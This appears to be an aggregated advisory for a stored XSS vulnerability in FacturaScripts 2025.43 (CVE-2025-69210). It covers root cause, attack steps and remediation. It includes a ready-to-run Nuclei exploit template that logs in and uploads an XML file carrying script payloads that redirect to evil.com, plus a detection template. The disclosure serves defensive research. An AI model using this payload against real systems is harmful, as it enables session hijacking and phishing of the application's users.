[webapps] FacturaScripts 2025.43 - XSS
CVE-2025-69210
FacturaScripts 2025.43 contains a stored XSS vulnerability that allows an attacker to inject malicious script.
Medium · CVSS 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
📋 Basic Vulnerability Information
| CVE | CVE-2025-69210 |
|---|---|
| Vulnerability type | Cross-site scripting (XSS) |
| Affected versions | FacturaScripts 2025.43 |
| Severity | Medium · CVSS 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |
| Published | 2026-04-29 |
| Submitter | VETTRIVEL U |
| Source | Exploit-DB original |
🔬 Root Cause
The application does not adequately filter and escape user-controlled input before writing it into the page, so JavaScript supplied by the attacker is executed by the victim's browser. The original write-up does not name a specific function or parameter; this is a generic XSS design flaw.
🎯 Attack Scenario
1. The attacker submits data containing malicious JavaScript to the FacturaScripts application (for example in a form field).
2. The application stores the data and later renders it in a page without filtering.
3. A victim (an administrator or a regular user) visits the page containing the malicious code.
4. The code runs in the victim's browser and may steal the session, perform actions on the victim's behalf, and so on.
Indicator of success: the victim's browser executes the script injected by the attacker.
💥 Impact
The attacker can execute arbitrary JavaScript in the victim's browser, leading to session hijacking, data theft, phishing, or defacement of page content; the flaw does not by itself give remote code execution or privilege escalation.
⚔️ Nuclei Exploit Template
The following exploitation template is in standard Nuclei v3 format and can be used directly to verify the vulnerability:
```yaml
id: CVE-2025-69210-exploit

info:
  name: FacturaScripts 2025.43 - Stored XSS Exploit
  author: VETTRIVEL U
  severity: medium
  description: |
    Authenticated stored XSS via product file upload. A crafted XML file containing JavaScript
    is uploaded as a product attachment. When the file is accessed, JavaScript executes in the browser context.
  reference:
    - https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md
  tags: facturascripts,xss,stored,authenticated

variables:
  username: '{{username}}'
  password: '{{password}}'

http:
  - raw:
      - |
        POST /index.php?page=Login&action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&action=login
      - |
        GET /ListProducto HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'ListProducto'
        part: body
    extractors:
      - type: regex
        name: product_list_url
        part: body
        regex:
          - '/EditProducto\?code=\d+'

  - raw:
      - |
        POST /EditProducto?code=10 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPU65l8Am0L64rWdo
        Cookie: {{cookie}}

        ------WebKitFormBoundaryPU65l8Am0L64rWdo
        Content-Disposition: form-data; name="new-files[]"; filename="xss.xml"
        Content-Type: text/xml

        <html>
          <head></head>
          <body>
            <something:script xmlns:something="http://www.w3.org/1999/xhtml">
              alert("XSS");
              if (confirm("Now Redirect POC")) {
                top.location.href = "https://evil.com";
              }
            </something:script>
            <a:script xmlns:a="http://www.w3.org/1999/xhtml">
              alert("XSS");
              if (confirm("Now Redirect POC")) {
                location.href = "https://evil.com";
              }
            </a:script>
            <info>
              <name>
                <value>
                  <![CDATA[
                  <script>
                    alert("XSS");
                    if (confirm("Now Redirect POC")) {
                      window.location = "https://evil.com";
                    }
                  </script>
                  ]]>
                </value>
              </name>
              <description>
                <value>Hello</value>
              </description>
              <url>
                <value>http://google.com</value>
              </url>
            </info>
          </body>
        </html>
        ------WebKitFormBoundaryPU65l8Am0L64rWdo--
    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'OK'
        part: body

  - raw:
      - |
        GET /MyFiles/2025/12/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9 HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'alert("XSS")'
        part: body
```
🔍 Nuclei Detection Template
The following detection template is used to judge whether a target is affected. Note that it only fingerprints FacturaScripts and matches any dotted number in the page; it does not confirm the vulnerable version, so expect false positives on patched installations:
```yaml
id: CVE-2025-69210-detection

info:
  name: FacturaScripts 2025.43 - XSS Detection
  author: VETTRIVEL U
  severity: medium
  description: |
    FacturaScripts versions up to 2025.43 are vulnerable to stored XSS via product file upload.
    This template checks for the presence of vulnerable versions or the core file that handles file uploads.
  reference:
    - https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md
    - https://github.com/advisories/GHSA-2267-xqcf-gw2m
  tags: facturascripts,xss,stored

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php'
      - '{{BaseURL}}'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'FacturaScripts'
        part: body
      - type: regex
        regex:
          - '[0-9]+\.[0-9]+'
        part: body
        condition: or
```
🛡️ Remediation
Upgrade to the latest security release of FacturaScripts. Interim mitigation: HTML-entity-encode and escape all user input on output, and deploy a Content Security Policy (CSP).
📎 Reference Links
⚠️ This article is based on public vulnerability databases and is intended only for security research and defensive reference. Generated: 2026-05-07 05:41 | Source: Exploit-DB